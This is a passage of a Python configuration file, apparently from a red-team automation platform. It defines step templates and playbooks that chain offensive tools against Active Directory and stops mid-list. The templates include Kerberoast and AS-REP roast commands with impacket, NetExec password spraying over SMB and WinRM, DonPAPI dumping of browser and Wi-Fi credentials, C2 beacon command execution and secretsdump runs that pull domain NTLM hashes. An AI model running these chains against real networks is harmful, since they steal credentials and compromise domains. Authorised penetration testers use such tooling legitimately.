# ── String constants (SonarQube S1192) ──────────────────────────────────
_EXEC_MODE = "Execution mode"
_EXTRA_FLAGS = "Extra flags"
_ACTIVITY_TYPE = "Activity type"
_ATTACKER_TARGET_ID = "Attacker target id"
_HOST_ID = "Host id"
_CRED_ID = "Cred id"
_HASH_NTLM = "Hash (NTLM)"
_NMAP_DEFAULT_FLAGS = "-sV -sC -T4 --open"
_NUCLEI_DEFAULT_SEVERITY = "critical,high,medium"
_PLAYBOOK_RUN_NOT_FOUND = "Playbook run not found"
_CMD_OUTPUTS_CREATE = "command_outputs.create"
_TOPOLOGY_AUTO_BUILD = "Topology auto-build"
_KERBEROAST_CMD = "impacket-GetUserSPNs '{domain}/{username}:{password}' -dc-ip {target} -request -outputfile /tmp/kerberoast_{target}.txt 2>&1 && echo 'DONE'"
_CONTINUE_ON_SUCCESS = "--continue-on-success --no-bruteforce"
_SPN_ENUM_CMD = "impacket-GetUserSPNs '{domain}/{username}:{password}' -dc-ip {target} 2>&1"
_FIND_DELEGATION_CMD = "impacket-findDelegation '{domain}/{username}:{password}' -dc-ip {target} 2>&1"
_TARGET = "{target}"


STEP_TEMPLATES = {
    "topology:auto_build": {
        "id": "topology:auto_build",
        "title": "Topology Auto-Build",
        "connector_key": "topology",
        "operation": "auto_build",
        "description": "Build or refresh the network graph from known hosts.",
        "fields": [
            {
                "key": "keep_manual_positions",
                "label": "Keep manual positions",
                "type": "boolean",
                "default": True,
            },
            {
                "key": "create_missing_networks",
                "label": "Create missing networks",
                "type": "boolean",
                "default": True,
            },
        ],
    },
    "topology:rebuild_layout": {
        "id": "topology:rebuild_layout",
        "title": "Topology Rebuild Layout",
        "connector_key": "topology",
        "operation": "rebuild_layout",
        "description": "Recompute node positions for the current map.",
        "fields": [
            {
                "key": "keep_manual_positions",
                "label": "Keep manual positions",
                "type": "boolean",
                "default": True,
            },
        ],
    },
    "nmap:scan": {
        "id": "nmap:scan",
        "title": "Nmap Scan",
        "connector_key": "nmap",
        "operation": "scan",
        "description": "Network discovery and service fingerprinting.",
        "fields": [
            {
                "key": "target",
                "label": "Target",
                "type": "text",
                "default": "",
                "runtime_fallback": True,
            },
            {"key": "flags", "label": "Flags", "type": "text", "default": _NMAP_DEFAULT_FLAGS},
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 180},
            {"key": "target_id", "label": _ATTACKER_TARGET_ID, "type": "text", "default": ""},
        ],
    },
    "nuclei:scan": {
        "id": "nuclei:scan",
        "title": "Nuclei Scan",
        "connector_key": "nuclei",
        "operation": "scan",
        "description": "Template-based vulnerability scan for a URL.",
        "fields": [
            {
                "key": "target_url",
                "label": "Target URL",
                "type": "text",
                "default": "",
                "runtime_fallback": True,
            },
            {
                "key": "severity",
                "label": "Severity",
                "type": "text",
                "default": _NUCLEI_DEFAULT_SEVERITY,
            },
            {"key": "templates", "label": "Templates path", "type": "text", "default": ""},
            {"key": "extra_flags", "label": _EXTRA_FLAGS, "type": "text", "default": ""},
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 300},
            {"key": "target_id", "label": _ATTACKER_TARGET_ID, "type": "text", "default": ""},
        ],
    },
    "netexec:scan": {
        "id": "netexec:scan",
        "title": "NetExec Scan",
        "connector_key": "netexec",
        "operation": "scan",
        "description": "Credential-aware internal enumeration.",
        "fields": [
            {
                "key": "target",
                "label": "Target",
                "type": "text",
                "default": "",
                "runtime_fallback": True,
            },
            {
                "key": "protocol",
                "label": "Protocol",
                "type": "select",
                "options": ["smb", "winrm", "rdp", "ldap", "mssql"],
                "default": "smb",
            },
            {
                "key": "extra_flags",
                "label": _EXTRA_FLAGS,
                "type": "text",
                "default": "--users --groups",
            },
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 120},
            {"key": "username", "label": "Username", "type": "text", "default": ""},
            {"key": "password", "label": "Password", "type": "text", "default": ""},
            {"key": "domain", "label": "Domain", "type": "text", "default": ""},
            {"key": "hash", "label": "Hash", "type": "text", "default": ""},
            {"key": "target_id", "label": _ATTACKER_TARGET_ID, "type": "text", "default": ""},
        ],
    },
    "attacker_ssh:exec": {
        "id": "attacker_ssh:exec",
        "title": "Attacker SSH Exec",
        "connector_key": "attacker_ssh",
        "operation": "exec",
        "description": "Execute a command from the attacker box.",
        "fields": [
            {
                "key": "command",
                "label": "Command",
                "type": "textarea",
                "default": "",
                "required": True,
            },
            {
                "key": "execution_mode",
                "label": _EXEC_MODE,
                "type": "select",
                "options": ["auto", "project", "global"],
                "default": "auto",
            },
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 45},
            {"key": "activity_type", "label": _ACTIVITY_TYPE, "type": "text", "default": "postex"},
            {"key": "host_id", "label": _HOST_ID, "type": "text", "default": ""},
            {"key": "cred_id", "label": _CRED_ID, "type": "text", "default": ""},
            {"key": "target_id", "label": _ATTACKER_TARGET_ID, "type": "text", "default": ""},
        ],
    },
    "c2:exec": {
        "id": "c2:exec",
        "title": "C2 Live Action",
        "connector_key": "c2",
        "operation": "exec",
        "description": "Execute a command (or BOF) via a live C2 beacon — currently Adaptix; writes a HostActivity on completion.",
        "fields": [
            {
                "key": "integration_id",
                "label": "C2 Integration id",
                "type": "text",
                "default": "",
                "required": True,
            },
            {
                "key": "agent_id",
                "label": "Agent / Beacon id",
                "type": "text",
                "default": "",
                "required": True,
            },
            {
                "key": "host_id",
                "label": "Target host id",
                "type": "text",
                "default": "",
                "required": True,
            },
            {
                "key": "commandline",
                "label": "Command",
                "type": "textarea",
                "default": "",
                "required": True,
            },
            {
                "key": "mode",
                "label": "Mode",
                "type": "select",
                "options": ["command", "bof"],
                "default": "command",
            },
            {
                "key": "credential_source",
                "label": "Cred source",
                "type": "select",
                "options": ["rootnotes", "c2"],
                "default": "rootnotes",
            },
            {"key": "credential_id", "label": _CRED_ID, "type": "text", "default": ""},
            {
                "key": "wait_for_output",
                "label": "Wait for output",
                "type": "boolean",
                "default": True,
            },
            {"key": "timeout_seconds", "label": "Timeout (sec)", "type": "number", "default": 12},
            {"key": "title", "label": "Activity title", "type": "text", "default": ""},
        ],
    },
    # ── AD / Kerberos templates ───────────────────────────────────────────
    "attacker_ssh:kerberoast": {
        "id": "attacker_ssh:kerberoast",
        "title": "Kerberoast (impacket)",
        "connector_key": "attacker_ssh",
        "operation": "exec",
        "description": "Request Kerberos TGS tickets for SPN accounts and save for offline cracking.",
        "fields": [
            {
                "key": "command",
                "label": "Command",
                "type": "textarea",
                "default": _KERBEROAST_CMD,
                "required": True,
            },
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 120},
            {
                "key": "activity_type",
                "label": _ACTIVITY_TYPE,
                "type": "text",
                "default": "kerberoast",
            },
            {
                "key": "execution_mode",
                "label": _EXEC_MODE,
                "type": "select",
                "options": ["auto", "project", "global"],
                "default": "auto",
            },
            {"key": "target_id", "label": _ATTACKER_TARGET_ID, "type": "text", "default": ""},
            {"key": "host_id", "label": _HOST_ID, "type": "text", "default": ""},
            {"key": "cred_id", "label": _CRED_ID, "type": "text", "default": ""},
        ],
    },
    "attacker_ssh:asreproast": {
        "id": "attacker_ssh:asreproast",
        "title": "AS-REP Roast (impacket)",
        "connector_key": "attacker_ssh",
        "operation": "exec",
        "description": "Find accounts without Kerberos pre-authentication and request AS-REP hashes.",
        "fields": [
            {
                "key": "command",
                "label": "Command",
                "type": "textarea",
                "default": "impacket-GetNPUsers '{domain}/' -dc-ip {target} -no-pass -usersfile /tmp/users.txt -outputfile /tmp/asrep_{target}.txt 2>&1 && echo 'DONE'",
                "required": True,
            },
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 90},
            {
                "key": "activity_type",
                "label": _ACTIVITY_TYPE,
                "type": "text",
                "default": "asreproast",
            },
            {
                "key": "execution_mode",
                "label": _EXEC_MODE,
                "type": "select",
                "options": ["auto", "project", "global"],
                "default": "auto",
            },
            {"key": "target_id", "label": _ATTACKER_TARGET_ID, "type": "text", "default": ""},
            {"key": "host_id", "label": _HOST_ID, "type": "text", "default": ""},
            {"key": "cred_id", "label": _CRED_ID, "type": "text", "default": ""},
        ],
    },
    "attacker_ssh:ldap_dump": {
        "id": "attacker_ssh:ldap_dump",
        "title": "LDAP Dump (ldapdomaindump)",
        "connector_key": "attacker_ssh",
        "operation": "exec",
        "description": "Dump all AD objects via LDAP and save to /tmp. Requires valid domain credentials.",
        "fields": [
            {
                "key": "command",
                "label": "Command",
                "type": "textarea",
                "default": "ldapdomaindump -u '{domain}\\{username}' -p '{password}' {target} -o /tmp/ldap_{target} 2>&1 && echo 'DONE'",
                "required": True,
            },
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 180},
            {
                "key": "activity_type",
                "label": _ACTIVITY_TYPE,
                "type": "text",
                "default": "ldap_enum",
            },
            {
                "key": "execution_mode",
                "label": _EXEC_MODE,
                "type": "select",
                "options": ["auto", "project", "global"],
                "default": "auto",
            },
            {"key": "target_id", "label": _ATTACKER_TARGET_ID, "type": "text", "default": ""},
            {"key": "host_id", "label": _HOST_ID, "type": "text", "default": ""},
            {"key": "cred_id", "label": _CRED_ID, "type": "text", "default": ""},
        ],
    },
    "netexec:ldap_enum": {
        "id": "netexec:ldap_enum",
        "title": "NetExec LDAP Enum",
        "connector_key": "netexec",
        "operation": "scan",
        "description": "Enumerate AD users, groups, computers and password policy via LDAP.",
        "fields": [
            {
                "key": "target",
                "label": "Target DC IP",
                "type": "text",
                "default": "",
                "runtime_fallback": True,
            },
            {
                "key": "protocol",
                "label": "Protocol",
                "type": "select",
                "options": ["ldap", "ldaps"],
                "default": "ldap",
            },
            {
                "key": "extra_flags",
                "label": _EXTRA_FLAGS,
                "type": "text",
                "default": "--users --groups --computers --password-not-required --admin-count --trusted-for-delegation",
            },
            {"key": "username", "label": "Username", "type": "text", "default": ""},
            {"key": "password", "label": "Password", "type": "text", "default": ""},
            {"key": "domain", "label": "Domain", "type": "text", "default": ""},
            {"key": "hash", "label": "Hash", "type": "text", "default": ""},
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 120},
            {"key": "target_id", "label": _ATTACKER_TARGET_ID, "type": "text", "default": ""},
        ],
    },
    "netexec:spray_smb": {
        "id": "netexec:spray_smb",
        "title": "NetExec SMB Spray",
        "connector_key": "netexec",
        "operation": "scan",
        "description": "Password spray a single username:password pair across SMB targets. Uses --continue-on-success.",
        "fields": [
            {
                "key": "target",
                "label": "Target",
                "type": "text",
                "default": "",
                "runtime_fallback": True,
            },
            {
                "key": "protocol",
                "label": "Protocol",
                "type": "select",
                "options": ["smb", "winrm", "rdp", "mssql", "ssh"],
                "default": "smb",
            },
            {
                "key": "extra_flags",
                "label": _EXTRA_FLAGS,
                "type": "text",
                "default": _CONTINUE_ON_SUCCESS,
            },
            {"key": "username", "label": "Username", "type": "text", "default": ""},
            {"key": "password", "label": "Password", "type": "text", "default": ""},
            {"key": "domain", "label": "Domain", "type": "text", "default": ""},
            {"key": "hash", "label": _HASH_NTLM, "type": "text", "default": ""},
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 120},
            {"key": "target_id", "label": _ATTACKER_TARGET_ID, "type": "text", "default": ""},
        ],
    },
    "donpapi:scan": {
        "id": "donpapi:scan",
        "title": "DonPAPI Collect",
        "connector_key": "donpapi",
        "operation": "scan",
        "description": "Dump DPAPI vaults / Wi-Fi / browser creds via DonPAPI. Use cred_id (preferred) or inline username + password/nthash.",
        "fields": [
            {
                "key": "target",
                "label": "Target (IP or comma-list)",
                "type": "text",
                "default": "",
                "runtime_fallback": True,
            },
            {"key": "username", "label": "Username", "type": "text", "default": ""},
            {"key": "password", "label": "Password", "type": "text", "default": ""},
            {"key": "nthash", "label": "NT hash", "type": "text", "default": ""},
            {"key": "domain", "label": "Domain", "type": "text", "default": ""},
            {"key": "cred_id", "label": "Cred id (preferred)", "type": "text", "default": ""},
            {"key": "extra_flags", "label": _EXTRA_FLAGS, "type": "text", "default": ""},
            {
                "key": "fetch_loot",
                "label": "Fetch loot tarball",
                "type": "boolean",
                "default": True,
            },
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 600},
            {"key": "target_id", "label": _ATTACKER_TARGET_ID, "type": "text", "default": ""},
        ],
    },
    "httpx:scan": {
        "id": "httpx:scan",
        "title": "httpx Web Probe",
        "connector_key": "httpx",
        "operation": "scan",
        "description": "Probe HTTP/HTTPS services on a host or URL list. Discovers live web services, titles, and technologies.",
        "fields": [
            {
                "key": "target",
                "label": "Target (host, IP, CIDR or URL)",
                "type": "text",
                "default": "",
                "runtime_fallback": True,
            },
            {
                "key": "flags",
                "label": "Flags",
                "type": "text",
                "default": "-title -status-code -tech-detect -follow-redirects",
            },
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 120},
            {"key": "target_id", "label": _ATTACKER_TARGET_ID, "type": "text", "default": ""},
        ],
    },
    "ffuf:scan": {
        "id": "ffuf:scan",
        "title": "ffuf Content Discovery",
        "connector_key": "ffuf",
        "operation": "scan",
        "description": "Fuzz web directories and files. Creates findings for discovered paths.",
        "fields": [
            {
                "key": "target_url",
                "label": "Target URL",
                "type": "text",
                "default": "",
                "runtime_fallback": True,
            },
            {
                "key": "wordlist",
                "label": "Wordlist path",
                "type": "text",
                "default": "/usr/share/seclists/Discovery/Web-Content/common.txt",
            },
            {
                "key": "extensions",
                "label": "Extensions (e.g. php,html)",
                "type": "text",
                "default": "",
            },
            {
                "key": "flags",
                "label": "Flags",
                "type": "text",
                "default": "-mc 200,204,301,302,307,401,403,405",
            },
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 300},
            {"key": "target_id", "label": _ATTACKER_TARGET_ID, "type": "text", "default": ""},
        ],
    },
    # ── AD — new step templates ───────────────────────────────────────────────
    "attacker_ssh:spn_enum": {
        "id": "attacker_ssh:spn_enum",
        "title": "SPN Enumeration (impacket)",
        "connector_key": "attacker_ssh",
        "operation": "exec",
        "description": "List all SPN accounts (Kerberoastable) without requesting tickets.",
        "fields": [
            {
                "key": "command",
                "label": "Command",
                "type": "textarea",
                "default": _SPN_ENUM_CMD,
                "required": True,
            },
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 60},
            {"key": "activity_type", "label": _ACTIVITY_TYPE, "type": "text", "default": "recon"},
            {
                "key": "execution_mode",
                "label": _EXEC_MODE,
                "type": "select",
                "options": ["auto", "project", "global"],
                "default": "auto",
            },
        ],
    },
    "attacker_ssh:adcs_enum": {
        "id": "attacker_ssh:adcs_enum",
        "title": "ADCS Enum (certipy)",
        "connector_key": "attacker_ssh",
        "operation": "exec",
        "description": "Find vulnerable AD CS templates (ESC1–ESC8) via certipy-ad.",
        "fields": [
            {
                "key": "command",
                "label": "Command",
                "type": "textarea",
                "default": "certipy-ad find -u '{username}@{domain}' -p '{password}' -dc-ip {target} -stdout 2>&1",
                "required": True,
            },
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 120},
            {"key": "activity_type", "label": _ACTIVITY_TYPE, "type": "text", "default": "recon"},
            {
                "key": "execution_mode",
                "label": _EXEC_MODE,
                "type": "select",
                "options": ["auto", "project", "global"],
                "default": "auto",
            },
        ],
    },
    "attacker_ssh:delegation_enum": {
        "id": "attacker_ssh:delegation_enum",
        "title": "Delegation Enum (impacket)",
        "connector_key": "attacker_ssh",
        "operation": "exec",
        "description": "Find accounts with unconstrained or constrained Kerberos delegation.",
        "fields": [
            {
                "key": "command",
                "label": "Command",
                "type": "textarea",
                "default": _FIND_DELEGATION_CMD,
                "required": True,
            },
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 60},
            {"key": "activity_type", "label": _ACTIVITY_TYPE, "type": "text", "default": "recon"},
            {
                "key": "execution_mode",
                "label": _EXEC_MODE,
                "type": "select",
                "options": ["auto", "project", "global"],
                "default": "auto",
            },
        ],
    },
    "attacker_ssh:bloodhound_collect": {
        "id": "attacker_ssh:bloodhound_collect",
        "title": "BloodHound Collection (bloodhound-python)",
        "connector_key": "attacker_ssh",
        "operation": "exec",
        "description": "Collect BloodHound data via bloodhound-python. Saves JSON files to /tmp/bh_{target}/.",
        "fields": [
            {
                "key": "command",
                "label": "Command",
                "type": "textarea",
                "default": "mkdir -p /tmp/bh_{target} && bloodhound-python -u '{username}' -p '{password}' -d '{domain}' -ns {target} -c All --zip -o /tmp/bh_{target}/ 2>&1 && echo 'DONE'",
                "required": True,
            },
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 300},
            {"key": "activity_type", "label": _ACTIVITY_TYPE, "type": "text", "default": "recon"},
            {
                "key": "execution_mode",
                "label": _EXEC_MODE,
                "type": "select",
                "options": ["auto", "project", "global"],
                "default": "auto",
            },
        ],
    },
    "netexec:spray_winrm": {
        "id": "netexec:spray_winrm",
        "title": "NetExec WinRM Spray",
        "connector_key": "netexec",
        "operation": "scan",
        "description": "Password spray via WinRM. Identifies hosts where the credential grants remote shell access.",
        "fields": [
            {
                "key": "target",
                "label": "Target",
                "type": "text",
                "default": "",
                "runtime_fallback": True,
            },
            {
                "key": "protocol",
                "label": "Protocol",
                "type": "select",
                "options": ["winrm", "smb", "mssql", "rdp"],
                "default": "winrm",
            },
            {
                "key": "extra_flags",
                "label": _EXTRA_FLAGS,
                "type": "text",
                "default": _CONTINUE_ON_SUCCESS,
            },
            {"key": "username", "label": "Username", "type": "text", "default": ""},
            {"key": "password", "label": "Password", "type": "text", "default": ""},
            {"key": "domain", "label": "Domain", "type": "text", "default": ""},
            {"key": "hash", "label": _HASH_NTLM, "type": "text", "default": ""},
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 120},
            {"key": "target_id", "label": _ATTACKER_TARGET_ID, "type": "text", "default": ""},
        ],
    },
    "netexec:adcs_check": {
        "id": "netexec:adcs_check",
        "title": "NetExec ADCS Check",
        "connector_key": "netexec",
        "operation": "scan",
        "description": "Check for ADCS (Certificate Services) via NetExec ldap --adcs module.",
        "fields": [
            {
                "key": "target",
                "label": "Target DC IP",
                "type": "text",
                "default": "",
                "runtime_fallback": True,
            },
            {
                "key": "protocol",
                "label": "Protocol",
                "type": "select",
                "options": ["ldap", "ldaps"],
                "default": "ldap",
            },
            {"key": "extra_flags", "label": _EXTRA_FLAGS, "type": "text", "default": "--adcs"},
            {"key": "username", "label": "Username", "type": "text", "default": ""},
            {"key": "password", "label": "Password", "type": "text", "default": ""},
            {"key": "domain", "label": "Domain", "type": "text", "default": ""},
            {"key": "hash", "label": _HASH_NTLM, "type": "text", "default": ""},
            {"key": "timeout_seconds", "label": "Timeout", "type": "number", "default": 60},
            {"key": "target_id", "label": _ATTACKER_TARGET_ID, "type": "text", "default": ""},
        ],
    },
}


BUILTIN_PLAYBOOKS = {
    "donpapi-collect": {
        "id": "donpapi-collect",
        "title": "DonPAPI — DPAPI Collection",
        "description": "Validate domain creds via NetExec SMB, then dump DPAPI vaults/Wi-Fi/browser creds with DonPAPI. Fill target + username + password (or hash) in the run form.",
        "editable": False,
        "steps": [
            {
                "title": "NetExec SMB — auth probe",
                "connector_key": "netexec",
                "operation": "scan",
                "params": {"protocol": "smb", "extra_flags": "--shares"},
                "on_success": "next",
                "on_failure": "stop",
            },
            {
                "title": "DonPAPI — collect",
                "connector_key": "donpapi",
                "operation": "scan",
                "params": {"fetch_loot": True, "timeout_seconds": 600},
                "on_success": "stop",
                "on_failure": "stop",
                "depends_on": [1],
            },
        ],
    },
    "topology-refresh": {
        "id": "topology-refresh",
        "title": "Topology Refresh",
        "description": "Rebuild the operational graph from all known hosts.",
        "editable": False,
        "steps": [
            {
                "title": _TOPOLOGY_AUTO_BUILD,
                "connector_key": "topology",
                "operation": "auto_build",
                "params": {},
                "on_failure": "stop",
            },
        ],
    },
    "internal-recon": {
        "id": "internal-recon",
        "title": "Internal Recon",
        "description": "Run an Nmap scan and then refresh topology from discovered hosts.",
        "editable": False,
        "steps": [
            {
                "title": "Nmap scan",
                "connector_key": "nmap",
                "operation": "scan",
                "params": {},
                "on_success": "next",
                "on_failure": "stop",
                "result_conditions": [
                    {
                        "when": "success",
                        "result_key": "hosts_found",
                        "operator": "eq",
                        "value": 0,
                        "action": "stop",
                    }
                ],
            },
            {
                "title": _TOPOLOGY_AUTO_BUILD,
                "connector_key": "topology",
                "operation": "auto_build",
                "params": {},
                "on_success": "next",
                "on_failure": "stop",
            },
        ],
    },
    "web-triage": {
        "id": "web-triage",
        "title": "Web Triage",
        "description": "Run a Nuclei scan against a supplied target URL.",
        "editable": False,
        "steps": [
            {
                "title": "Nuclei scan",
                "connector_key": "nuclei",
                "operation": "scan",
                "params": {},
                "on_success": "next",
                "on_failure": "stop",
                "result_conditions": [
                    {
                        "when": "success",
                        "result_key": "findings_created",
                        "operator": "gt",
                        "value": 0,
                        "action": "stop",
                    }
                ],
            },
        ],
    },
    # ── AD Playbooks ──────────────────────────────────────────────────────
    "ad-ldap-enum": {
        "id": "ad-ldap-enum",
        "title": "AD — LDAP Enumeration",
        "description": "Enumerate AD users, groups, computers and password policy via NetExec LDAP. Requires domain credentials in the run form.",
        "editable": False,
        "steps": [
            {
                "title": "NetExec LDAP — users/groups/computers",
                "connector_key": "netexec",
                "operation": "scan",
                "params": {
                    "protocol": "ldap",
                    "extra_flags": "--users --groups --computers --password-not-required --admin-count --trusted-for-delegation",
                },
                "on_success": "next",
                "on_failure": "stop",
            },
        ],
    },
    "ad-spray-smb": {
        "id": "ad-spray-smb",
        "title": "AD — SMB Password Spray",
        "description": "Spray a single username:password pair across SMB hosts. Set credentials in the run form. Uses --continue-on-success so the scan keeps going after first hit.",
        "editable": False,
        "steps": [
            {
                "title": "NetExec SMB spray",
                "connector_key": "netexec",
                "operation": "scan",
                "params": {
                    "protocol": "smb",
                    "extra_flags": _CONTINUE_ON_SUCCESS,
                },
                "on_success": "next",
                "on_failure": "stop",
            },
        ],
    },
    "ad-spray-winrm": {
        "id": "ad-spray-winrm",
        "title": "AD — WinRM Spray",
        "description": "Spray credentials via WinRM across all targets. Identifies hosts where the credential grants remote shell access (Pwn3d! = local admin).",
        "editable": False,
        "steps": [
            {
                "title": "NetExec WinRM spray",
                "connector_key": "netexec",
                "operation": "scan",
                "params": {
                    "protocol": "winrm",
                    "extra_flags": _CONTINUE_ON_SUCCESS,
                },
                "on_success": "stop",
                "on_failure": "stop",
            },
        ],
    },
    "ad-bloodhound": {
        "id": "ad-bloodhound",
        "title": "AD — BloodHound Collection",
        "description": "Collect full BloodHound data via bloodhound-python (All collectors). Saves a ZIP to /tmp/bh_{target}/ on the attacker box.",
        "editable": False,
        "steps": [
            {
                "title": "bloodhound-python — All collectors",
                "connector_key": "attacker_ssh",
                "operation": "exec",
                "params": {
                    "command": "mkdir -p /tmp/bh_{target} && bloodhound-python -u '{username}' -p '{password}' -d '{domain}' -ns {target} -c All --zip -o /tmp/bh_{target}/ 2>&1 && echo 'DONE'",
                    "timeout_seconds": 300,
                    "activity_type": "recon",
                    "execution_mode": "auto",
                },
                "on_success": "stop",
                "on_failure": "stop",
            },
        ],
    },
    "ad-full-enum": {
        "id": "ad-full-enum",
        "title": "AD — Full Enumeration Chain",
        "description": "Comprehensive AD enumeration: port scan → LDAP users/groups → SPN list → Kerberoast → delegation check → ADCS → topology refresh.",
        "editable": False,
        "steps": [
            {
                "title": "Nmap — DC port scan",
                "connector_key": "nmap",
                "operation": "scan",
                "params": {
                    "flags": "-p 53,88,135,139,389,443,445,464,636,3268,3269,5985 -sV --open"
                },
                "on_success": "next",
                "on_failure": "next",
            },
            {
                "title": "NetExec LDAP — users/groups/computers/policy",
                "connector_key": "netexec",
                "operation": "scan",
                "params": {
                    "protocol": "ldap",
                    "extra_flags": "--users --groups --computers --password-not-required --admin-count --trusted-for-delegation --pass-pol",
                },
                "on_success": "next",
                "on_failure": "next",
            },
            {
                "title": "NetExec LDAP — ADCS check",
                "connector_key": "netexec",
                "operation": "scan",
                "params": {"protocol": "ldap", "extra_flags": "--adcs"},
                "on_success": "next",
                "on_failure": "next",
            },
            {
                "title": "SPN discovery — Kerberoastable accounts",
                "connector_key": "attacker_ssh",
                "operation": "exec",
                "params": {
                    "command": _SPN_ENUM_CMD,
                    "timeout_seconds": 60,
                    "activity_type": "recon",
                    "execution_mode": "auto",
                },
                "on_success": "next",
                "on_failure": "next",
            },
            {
                "title": "Kerberoast — request TGS tickets",
                "connector_key": "attacker_ssh",
                "operation": "exec",
                "params": {
                    "command": _KERBEROAST_CMD,
                    "timeout_seconds": 120,
                    "activity_type": "kerberoast",
                    "execution_mode": "auto",
                },
                "on_success": "next",
                "on_failure": "next",
            },
            {
                "title": "Delegation enumeration",
                "connector_key": "attacker_ssh",
                "operation": "exec",
                "params": {
                    "command": _FIND_DELEGATION_CMD,
                    "timeout_seconds": 60,
                    "activity_type": "recon",
                    "execution_mode": "auto",
                },
                "on_success": "next",
                "on_failure": "next",
            },
            {
                "title": "Topology refresh",
                "connector_key": "topology",
                "operation": "auto_build",
                "params": {},
                "on_success": "stop",
                "on_failure": "stop",
            },
        ],
    },
}


# ── Operation Packs ───────────────────────────────────────────────────────────

_BUILTIN_PACKS = [
    {
        "id": "pack_builtin_initial_recon",
        "name": "Initial Recon",
        "description": "Fast host discovery + port scan + service version detection",
        "tags": ["recon", "nmap"],
        "steps": [
            {
                "title": "Ping sweep",
                "connector_key": "nmap",
                "operation": "ping_sweep",
                "params": {"target": _TARGET},
                "on_success": "next",
                "on_failure": "continue",
                "on_success_step": None,
                "on_failure_step": None,
                "result_conditions": [],
            },
            {
                "title": "Port scan (top 1000)",
                "connector_key": "nmap",
                "operation": "scan",
                "params": {"target": _TARGET, "flags": "-sV -sC -T4 --open --top-ports 1000"},
                "on_success": "next",
                "on_failure": "stop",
                "on_success_step": None,
                "on_failure_step": None,
                "result_conditions": [],
            },
            {
                "title": "UDP top ports",
                "connector_key": "nmap",
                "operation": "scan",
                "params": {"target": _TARGET, "flags": "-sU --top-ports 20 -T4"},
                "on_success": "next",
                "on_failure": "continue",
                "on_success_step": None,
                "on_failure_step": None,
                "result_conditions": [],
            },
        ],
    },
    {
        "id": "pack_builtin_web_enum",
        "name": "Web Enumeration",
        "description": "HTTP/HTTPS service detection, directory busting, tech fingerprinting",
        "tags": ["web", "enum"],
        "steps": [
            {
                "title": "Web port scan",
                "connector_key": "nmap",
                "operation": "scan",
                "params": {"target": _TARGET, "flags": "-sV -p 80,443,8080,8443,8000,8888 -T4"},
                "on_success": "next",
                "on_failure": "stop",
                "on_success_step": None,
                "on_failure_step": None,
                "result_conditions": [],
            },
            {
                "title": "Nikto scan",
                "connector_key": "ssh_exec",
                "operation": "exec",
                "params": {"command": "nikto -h {target} 2>&1 | head -100"},
                "on_success": "next",
                "on_failure": "continue",
                "on_success_step": None,
                "on_failure_step": None,
                "result_conditions": [],
            },
            {
                "title": "Gobuster dir",
                "connector_key": "ssh_exec",
                "operation": "exec",
                "params": {
                    "command": "gobuster dir -u http://{target} -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 30 2>&1"
                },
                "on_success": "next",
                "on_failure": "continue",
                "on_success_step": None,
                "on_failure_step": None,
                "result_conditions": [],
            },
        ],
    },
    {
        "id": "pack_builtin_ad_enum",
        "name": "AD Enumeration",
        "description": "Active Directory recon: domain info, users, SPNs, delegation",
        "tags": ["ad", "enum", "impacket"],
        "steps": [
            {
                "title": "Domain info (crackmapexec)",
                "connector_key": "ssh_exec",
                "operation": "exec",
                "params": {"command": "crackmapexec smb {target} 2>&1"},
                "on_success": "next",
                "on_failure": "continue",
                "on_success_step": None,
                "on_failure_step": None,
                "result_conditions": [],
            },
            {
                "title": "Enumerate users (impacket)",
                "connector_key": "ssh_exec",
                "operation": "exec",
                "params": {
                    "command": "impacket-GetADUsers '{domain}/{username}:{password}' -dc-ip {target} -all 2>&1"
                },
                "on_success": "next",
                "on_failure": "continue",
                "on_success_step": None,
                "on_failure_step": None,
                "result_conditions": [],
            },
            {
                "title": "Kerberoasting",
                "connector_key": "ssh_exec",
                "operation": "exec",
                "params": {
                    "command": "impacket-GetUserSPNs '{domain}/{username}:{password}' -dc-ip {target} -request -outputfile /tmp/kerberoast.txt 2>&1 && echo DONE"
                },
                "on_success": "next",
                "on_failure": "continue",
                "on_success_step": None,
                "on_failure_step": None,
                "result_conditions": [],
            },
            {
                "title": "AS-REP Roasting",
                "connector_key": "ssh_exec",
                "operation": "exec",
                "params": {
                    "command": "impacket-GetNPUsers '{domain}/' -dc-ip {target} -no-pass -usersfile /tmp/users.txt 2>&1"
                },
                "on_success": "next",
                "on_failure": "continue",
                "on_success_step": None,
                "on_failure_step": None,
                "result_conditions": [],
            },
        ],
    },
    {
        "id": "pack_builtin_cred_dump",
        "name": "Credential Dump",
        "description": "Local credential harvesting: SAM, LSA, LSASS dump",
        "tags": ["creds", "post-exploitation", "impacket"],
        "steps": [
            {
                "title": "SAM dump (impacket)",
                "connector_key": "ssh_exec",
                "operation": "exec",
                "params": {
                    "command": "impacket-secretsdump '{domain}/{username}:{password}@{target}' -just-dc-user Administrator 2>&1"
                },
                "on_success": "next",
                "on_failure": "continue",
                "on_success_step": None,
                "on_failure_step": None,
                "result_conditions": [],
            },
            {
                "title": "LSA secrets",
                "connector_key": "ssh_exec",
                "operation": "exec",
                "params": {
                    "command": "impacket-secretsdump '{domain}/{username}:{password}@{target}' -just-dc-ntlm 2>&1"
                },
                "on_success": "next",
                "on_failure": "continue",
                "on_success_step": None,
                "on_failure_step": None,
                "result_conditions": [],
            },
            {
                "title": "DPAPI secrets",
                "connector_key": "ssh_exec",
                "operation": "exec",
                "params": {
                    "command": "impacket-dpapi.py masterkey -file /path/to/masterkey -sid S-1-5-21-... 2>&1"
                },
                "on_success": "next",
                "on_failure": "continue",
